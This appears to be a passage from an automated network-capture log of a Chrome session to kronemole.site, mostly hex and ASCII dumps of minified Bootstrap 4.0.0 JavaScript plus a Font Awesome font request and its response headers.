                                                                          2023-11-21 16:58:40 UTC402INData Raw: 67 65 74 26 26 28 22 73 74 61 74 69 63 22 3d 3d 3d 6e 2e 5f 63 6f 6e 66 69 67 2e 62 61 63 6b 64 72 6f 70 3f 6e 2e 5f 65 6c 65 6d 65 6e 74 2e 66 6f 63 75 73 28 29 3a 6e 2e 68 69 64 65 28 29 29 7d 29 2c 73 26 26 50 2e 72 65 66 6c 6f 77 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2c 74 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 61 64 64 43 6c 61 73 73 28 5f 29 2c 21 65 29 72 65 74 75 72 6e 3b 69 66 28 21 73 29 72 65 74 75 72 6e 20 76 6f 69 64 20 65 28 29 3b 74 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 65 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 7d 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 69 73 53 68 6f 77 6e 26 26 74 68 69 73 2e 5f
                                                                          Data Ascii: get&&("static"===n._config.backdrop?n._element.focus():n.hide())}),s&&P.reflow(this._backdrop),t(this._backdrop).addClass(_),!e)return;if(!s)return void e();t(this._backdrop).one(P.TRANSITION_END,e).emulateTransitionEnd(150)}else if(!this._isShown&&this._
                                                                          2023-11-21 16:58:40 UTC403INData Raw: 3d 74 28 69 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 29 3b 74 28 69 29 2e 64 61 74 61 28 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 2c 73 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 2c 70 61 72 73 65 46 6c 6f 61 74 28 72 29 2d 65 2e 5f 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 2b 22 70 78 22 29 7d 29 2c 74 28 67 2e 4e 41 56 42 41 52 5f 54 4f 47 47 4c 45 52 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 76 61 72 20 73 3d 74 28 69 29 5b 30 5d 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 72 3d 74 28 69 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 29 3b 74 28 69 29 2e 64 61 74 61 28 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 2c 73 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 72 69 67 68
                                                                          Data Ascii: =t(i).css("margin-right");t(i).data("margin-right",s).css("margin-right",parseFloat(r)-e._scrollbarWidth+"px")}),t(g.NAVBAR_TOGGLER).each(function(n,i){var s=t(i)[0].style.marginRight,r=t(i).css("margin-right");t(i).data("margin-right",s).css("margin-righ
                                                                          2023-11-21 16:58:40 UTC405INData Raw: 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 65 2b 27 22 27 29 3b 73 5b 65 5d 28 69 29 7d 65 6c 73 65 20 61 2e 73 68 6f 77 26 26 73 2e 73 68 6f 77 28 69 29 7d 29 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 5d 29 2c 6f 7d 28 29 3b 72 65 74 75 72 6e 20 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 68 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 67 2e 44 41 54 41 5f 54 4f 47 47 4c 45 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76
                                                                          Data Ascii: [e])throw new TypeError('No method named "'+e+'"');s[e](i)}else a.show&&s.show(i)})},s(o,null,[{key:"VERSION",get:function(){return"4.0.0"}},{key:"Default",get:function(){return a}}]),o}();return t(document).on(h.CLICK_DATA_API,g.DATA_TOGGLE,function(e){v
                                                                          2023-11-21 16:58:40 UTC406INData Raw: 69 74 6c 65 3a 22 22 2c 64 65 6c 61 79 3a 30 2c 68 74 6d 6c 3a 21 31 2c 73 65 6c 65 63 74 6f 72 3a 21 31 2c 70 6c 61 63 65 6d 65 6e 74 3a 22 74 6f 70 22 2c 6f 66 66 73 65 74 3a 30 2c 63 6f 6e 74 61 69 6e 65 72 3a 21 31 2c 66 61 6c 6c 62 61 63 6b 50 6c 61 63 65 6d 65 6e 74 3a 22 66 6c 69 70 22 2c 62 6f 75 6e 64 61 72 79 3a 22 73 63 72 6f 6c 6c 50 61 72 65 6e 74 22 7d 2c 66 3d 22 73 68 6f 77 22 2c 64 3d 22 6f 75 74 22 2c 5f 3d 7b 48 49 44 45 3a 22 68 69 64 65 22 2b 6f 2c 48 49 44 44 45 4e 3a 22 68 69 64 64 65 6e 22 2b 6f 2c 53 48 4f 57 3a 22 73 68 6f 77 22 2b 6f 2c 53 48 4f 57 4e 3a 22 73 68 6f 77 6e 22 2b 6f 2c 49 4e 53 45 52 54 45 44 3a 22 69 6e 73 65 72 74 65 64 22 2b 6f 2c 43 4c 49 43 4b 3a 22 63 6c 69 63 6b 22 2b 6f 2c 46 4f 43 55 53 49 4e 3a 22 66 6f
                                                                          Data Ascii: itle:"",delay:0,html:!1,selector:!1,placement:"top",offset:0,container:!1,fallbackPlacement:"flip",boundary:"scrollParent"},f="show",d="out",_={HIDE:"hide"+o,HIDDEN:"hidden"+o,SHOW:"show"+o,SHOWN:"shown"+o,INSERTED:"inserted"+o,CLICK:"click"+o,FOCUSIN:"fo
                                                                          2023-11-21 16:58:40 UTC407INData Raw: 34 32 63 39 0d 0a 69 2e 5f 6c 65 61 76 65 28 6e 75 6c 6c 2c 69 29 7d 65 6c 73 65 7b 69 66 28 74 28 74 68 69 73 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 28 29 29 2e 68 61 73 43 6c 61 73 73 28 70 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 74 68 69 73 2e 5f 6c 65 61 76 65 28 6e 75 6c 6c 2c 74 68 69 73 29 3b 74 68 69 73 2e 5f 65 6e 74 65 72 28 6e 75 6c 6c 2c 74 68 69 73 29 7d 7d 2c 49 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 5f 74 69 6d 65 6f 75 74 29 2c 74 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 44 41 54 41 5f 4b 45 59 29 2c 74 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 6f 66 66 28 74 68 69 73 2e 63
                                                                          Data Ascii: 42c9i._leave(null,i)}else{if(t(this.getTipElement()).hasClass(p))return void this._leave(null,this);this._enter(null,this)}},I.dispose=function(){clearTimeout(this._timeout),t.removeData(this.element,this.constructor.DATA_KEY),t(this.element).off(this.c
                                                                          2023-11-21 16:58:40 UTC409INData Raw: 2e 44 41 54 41 5f 4b 45 59 2c 74 68 69 73 29 2c 74 2e 63 6f 6e 74 61 69 6e 73 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 74 69 70 29 7c 7c 74 28 72 29 2e 61 70 70 65 6e 64 54 6f 28 63 29 2c 74 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 49 4e 53 45 52 54 45 44 29 2c 74 68 69 73 2e 5f 70 6f 70 70 65 72 3d 6e 65 77 20 6e 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 72 2c 7b 70 6c 61 63 65 6d 65 6e 74 3a 68 2c 6d 6f 64 69 66 69 65 72 73 3a 7b 6f 66 66 73 65 74 3a 7b 6f 66 66 73 65 74 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6f 66 66 73 65 74 7d 2c 66 6c 69 70 3a 7b 62
                                                                          Data Ascii: .DATA_KEY,this),t.contains(this.element.ownerDocument.documentElement,this.tip)||t(r).appendTo(c),t(this.element).trigger(this.constructor.Event.INSERTED),this._popper=new n(this.element,r,{placement:h,modifiers:{offset:{offset:this.config.offset},flip:{b
                                                                          2023-11-21 16:58:40 UTC410INData Raw: 6d 65 6e 74 26 26 74 28 22 62 6f 64 79 22 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6f 66 66 28 22 6d 6f 75 73 65 6f 76 65 72 22 2c 6e 75 6c 6c 2c 74 2e 6e 6f 6f 70 29 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 5b 79 5d 3d 21 31 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 5b 54 5d 3d 21 31 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 5b 45 5d 3d 21 31 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 74 69 70 29 2e 68 61 73 43 6c 61 73 73 28 67 29 3f 74 28 69 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 72 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 72 28 29 2c 74 68 69 73 2e 5f 68 6f 76 65 72
                                                                          Data Ascii: ment&&t("body").children().off("mouseover",null,t.noop),this._activeTrigger[y]=!1,this._activeTrigger[T]=!1,this._activeTrigger[E]=!1,P.supportsTransitionEnd()&&t(this.tip).hasClass(g)?t(i).one(P.TRANSITION_END,r).emulateTransitionEnd(150):r(),this._hover
                                                                          2023-11-21 16:58:40 UTC411INData Raw: 6e 74 2e 4d 4f 55 53 45 45 4e 54 45 52 3a 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 46 4f 43 55 53 49 4e 2c 73 3d 6e 3d 3d 3d 45 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 4d 4f 55 53 45 4c 45 41 56 45 3a 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 46 4f 43 55 53 4f 55 54 3b 74 28 65 2e 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 69 2c 65 2e 63 6f 6e 66 69 67 2e 73 65 6c 65 63 74 6f 72 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 65 6e 74 65 72 28 74 29 7d 29 2e 6f 6e 28 73 2c 65 2e 63 6f 6e 66 69 67 2e 73 65 6c 65 63 74 6f 72 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6c 65 61 76 65 28 74 29 7d 29 7d 74 28 65 2e 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74
                                                                          Data Ascii: nt.MOUSEENTER:e.constructor.Event.FOCUSIN,s=n===E?e.constructor.Event.MOUSELEAVE:e.constructor.Event.FOCUSOUT;t(e.element).on(i,e.config.selector,function(t){return e._enter(t)}).on(s,e.config.selector,function(t){return e._leave(t)})}t(e.element).closest
                                                                          2023-11-21 16:58:40 UTC413INData Raw: 63 75 73 6f 75 74 22 3d 3d 3d 65 2e 74 79 70 65 3f 54 3a 45 5d 3d 21 31 29 2c 6e 2e 5f 69 73 57 69 74 68 41 63 74 69 76 65 54 72 69 67 67 65 72 28 29 7c 7c 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 2e 5f 74 69 6d 65 6f 75 74 29 2c 6e 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 64 2c 6e 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 26 26 6e 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 2e 68 69 64 65 3f 6e 2e 5f 74 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 3d 3d 64 26 26 6e 2e 68 69 64 65 28 29 7d 2c 6e 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 2e 68 69 64 65 29 3a 6e 2e 68 69 64 65 28 29 29 7d 2c 49 2e 5f 69 73 57 69 74 68 41 63 74 69 76 65 54 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: cusout"===e.type?T:E]=!1),n._isWithActiveTrigger()||(clearTimeout(n._timeout),n._hoverState=d,n.config.delay&&n.config.delay.hide?n._timeout=setTimeout(function(){n._hoverState===d&&n.hide()},n.config.delay.hide):n.hide())},I._isWithActiveTrigger=function
                                                                          2023-11-21 16:58:40 UTC414INData Raw: 2c 73 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3b 69 66 28 28 6e 7c 7c 21 2f 64 69 73 70 6f 73 65 7c 68 69 64 65 2f 2e 74 65 73 74 28 65 29 29 26 26 28 6e 7c 7c 28 6e 3d 6e 65 77 20 61 28 74 68 69 73 2c 73 29 2c 74 28 74 68 69 73 29 2e 64 61 74 61 28 69 2c 6e 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 65 2b 27 22 27 29 3b 6e 5b 65 5d 28 29 7d 7d 29 7d 2c 73 28 61 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30
                                                                          Data Ascii: ,s="object"==typeof e&&e;if((n||!/dispose|hide/.test(e))&&(n||(n=new a(this,s),t(this).data(i,n)),"string"==typeof e)){if("undefined"==typeof n[e])throw new TypeError('No method named "'+e+'"');n[e]()}})},s(a,null,[{key:"VERSION",get:function(){return"4.0
                                                                          2023-11-21 16:58:40 UTC415INData Raw: 74 2e 63 72 65 61 74 65 28 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6f 2c 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 67 3b 76 61 72 20 6d 3d 70 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 6d 2e 69 73 57 69 74 68 43 6f 6e 74 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 54 69 74 6c 65 28 29 7c 7c 74 68 69 73 2e 5f 67 65 74 43 6f 6e 74 65 6e 74 28 29 7d 2c 6d 2e 61 64 64 41 74 74 61 63 68 6d 65 6e 74 43 6c 61 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 28 74 68 69 73 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 28 29 29 2e 61 64 64 43 6c 61 73 73 28 22 62 73 2d 70 6f 70 6f 76 65 72 2d 22 2b 65 29 7d 2c 6d 2e 67 65 74 54 69 70 45 6c 65 6d 65
                                                                          Data Ascii: t.create(g.prototype),o.prototype.constructor=o,o.__proto__=g;var m=p.prototype;return m.isWithContent=function(){return this.getTitle()||this._getContent()},m.addAttachmentClass=function(e){t(this.getTipElement()).addClass("bs-popover-"+e)},m.getTipEleme
                                                                          2023-11-21 16:58:40 UTC417INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 7d 5d 29 2c 70 7d 28 55 29 3b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 67 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 67 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 67 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 67 7d 28 65 29 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 73 63 72 6f 6c 6c 73 70 79 22 2c 6e 3d 22 62 73 2e 73 63 72 6f 6c 6c 73 70 79 22 2c 69 3d 22 2e 22 2b 6e 2c 6f 3d 74 2e 66 6e 5b 65 5d 2c 61 3d 7b 6f 66 66 73 65 74 3a 31 30 2c 6d 65 74 68 6f 64 3a 22 61 75 74 6f 22 2c 74 61
                                                                          Data Ascii: function(){return h}}]),p}(U);return t.fn[e]=g._jQueryInterface,t.fn[e].Constructor=g,t.fn[e].noConflict=function(){return t.fn[e]=o,g._jQueryInterface},g}(e),K=function(t){var e="scrollspy",n="bs.scrollspy",i="."+n,o=t.fn[e],a={offset:10,method:"auto",ta
                                                                          2023-11-21 16:58:40 UTC418INData Raw: 3d 5b 5d 2c 74 68 69 73 2e 5f 74 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 48 65 69 67 68 74 28 29 2c 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 72 3d 50 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 65 29 3b 69 66 28 72 26 26 28 6e 3d 74 28 72 29 5b 30 5d 29 2c 6e 29 7b 76 61 72 20 6f 3d 6e 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 69 66 28 6f 2e 77 69 64 74 68 7c 7c 6f 2e 68 65 69 67 68 74 29 72 65 74 75 72 6e 5b 74 28 6e 29 5b 69 5d 28 29 2e 74 6f 70 2b 73 2c 72 5d 7d 72 65 74 75 72 6e 20 6e
                                                                          Data Ascii: =[],this._targets=[],this._scrollHeight=this._getScrollHeight(),t.makeArray(t(this._selector)).map(function(e){var n,r=P.getSelectorFromElement(e);if(r&&(n=t(r)[0]),n){var o=n.getBoundingClientRect();if(o.width||o.height)return[t(n)[i]().top+s,r]}return n
                                                                          2023-11-21 16:58:40 UTC419INData Raw: 5f 67 65 74 4f 66 66 73 65 74 48 65 69 67 68 74 28 29 3b 69 66 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 21 3d 3d 65 26 26 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 3e 3d 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 74 61 72 67 65 74 73 5b 74 68 69 73 2e 5f 74 61 72 67 65 74 73 2e 6c 65 6e 67 74 68 2d 31 5d 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 21 3d 3d 69 26 26 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 28 69 29 7d 65 6c 73 65 7b 69 66 28 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 26 26 74 3c 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 5b 30 5d 26 26 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 5b 30 5d 3e 30 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 3d 6e 75 6c 6c 2c 76 6f 69 64
                                                                          Data Ascii: _getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),t>=n){var i=this._targets[this._targets.length-1];this._activeTarget!==i&&this._activate(i)}else{if(this._activeTarget&&t<this._offsets[0]&&this._offsets[0]>0)return this._activeTarget=null,void
                                                                          2023-11-21 16:58:40 UTC421INData Raw: 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 5d 29 2c 6f 7d 28 29 3b 72 65 74 75 72 6e 20 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 68 2e 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 66 2e 44 41 54 41 5f 53 50 59 29 29 2c 6e 3d 65 2e 6c 65 6e 67 74 68 3b 6e 2d 2d 3b 29 7b 76 61 72 20 69 3d 74 28 65 5b 6e 5d 29 3b 67 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 69 2c 69 2e 64 61 74 61 28 29 29 7d 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 67 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 67 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75
                                                                          Data Ascii: t:function(){return a}}]),o}();return t(window).on(h.LOAD_DATA_API,function(){for(var e=t.makeArray(t(f.DATA_SPY)),n=e.length;n--;){var i=t(e[n]);g._jQueryInterface.call(i,i.data())}}),t.fn[e]=g._jQueryInterface,t.fn[e].Constructor=g,t.fn[e].noConflict=fu
                                                                          2023-11-21 16:58:40 UTC422INData Raw: 2e 45 76 65 6e 74 28 72 2e 48 49 44 44 45 4e 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 65 2e 5f 65 6c 65 6d 65 6e 74 7d 29 2c 73 3d 74 2e 45 76 65 6e 74 28 72 2e 53 48 4f 57 4e 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 69 7d 29 3b 74 28 69 29 2e 74 72 69 67 67 65 72 28 6e 29 2c 74 28 65 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 73 29 7d 3b 6e 3f 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 28 6e 2c 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 29 3a 67 28 29 7d 7d 7d 2c 69 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 65 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 69 2e 5f 61 63 74 69 76 61 74 65 3d 66 75 6e 63 74 69 6f
                                                                          Data Ascii: .Event(r.HIDDEN,{relatedTarget:e._element}),s=t.Event(r.SHOWN,{relatedTarget:i});t(i).trigger(n),t(e._element).trigger(s)};n?this._activate(n,n.parentNode,g):g()}}},i.dispose=function(){t.removeData(this._element,e),this._element=null},i._activate=functio
                                                                          2023-11-21 16:58:40 UTC423INData Raw: 72 66 61 63 65 2c 74 2e 66 6e 2e 74 61 62 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 76 2c 74 2e 66 6e 2e 74 61 62 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 2e 74 61 62 3d 69 2c 76 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 76 7d 28 65 29 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 2e 20 6a 51 75 65 72 79 20 6d 75 73 74 20 62 65 20 69 6e 63 6c 75 64 65 64 20 62 65 66 6f 72 65 20 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70
                                                                          Data Ascii: rface,t.fn.tab.Constructor=v,t.fn.tab.noConflict=function(){return t.fn.tab=i,v._jQueryInterface},v}(e);!function(t){if("undefined"==typeof t)throw new TypeError("Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScrip
                                                                          2023-11-21 16:58:40 UTC424INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.449754104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC474OUTGET /assets/vendors/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://kronemole.site
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://kronemole.site/assets/vendors/fontawesome/css/all.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC484INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: font/woff2
                                                                          Content-Length: 80252
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Mon, 19 Jul 2021 19:00:02 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gZXSGBEdr5Yg64c9%2BYZOMj507sSl3WDC0FL4MviNwsO2c8bSMmsNj0uAc1ADCnzmz%2F%2FhwMIGGJcH%2FqgCyHk11X%2BC0lmQSUbjc64QXb11qtnSI2QLYPzlyz1PtOZiepLZFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a965ac23aea-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC484INData Raw: 77 4f 46 32 00 01 00 00 00 01 39 7c 00 0d 00 00 00 03 1e ec 00 01 39 22 01 4b 85 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 99 4e 11 08 0a 8a f4 60 88 ce 40 01 36 02 24 03 9f 30 0b 9f 34 00 04 20 05 8a 2b 07 e2 2e 5b 32 7b 92 00 3a ee ab 8a 00 75 57 e5 e6 67 79 bf 38 d5 8a 71 6c 12 bd 59 f9 37 52 3f ce f7 0a b8 eb 83 f3 00 41 0a fb 13 b3 ff ff ff ff b7 25 0b 59 ae 9d 59 98 40 12 48 0a b4 56 fb 60 6d 51 cf fb bc 33 11 99 02 09 16 44 25 aa 10 58 50 43 0a 5d 4f a2 89 a4 e0 96 4c 44 98 2d 0e d6 d9 98 63 a9 bb c9 35 d3 c5 d2 b2 4f 07 48 e4 09 44 04 22 02 11 c1 f1 79 97 73 6e e4 65 8e f1 18 e1 44 ce 20 22 10 11 88 08 f2 9c f3 68 cf 96 49 76 ed f3 8b 25 bc 90 2b c8 29 10 11 c4 11 fa e4 5f bd a7 3e 44 2a 5c 51
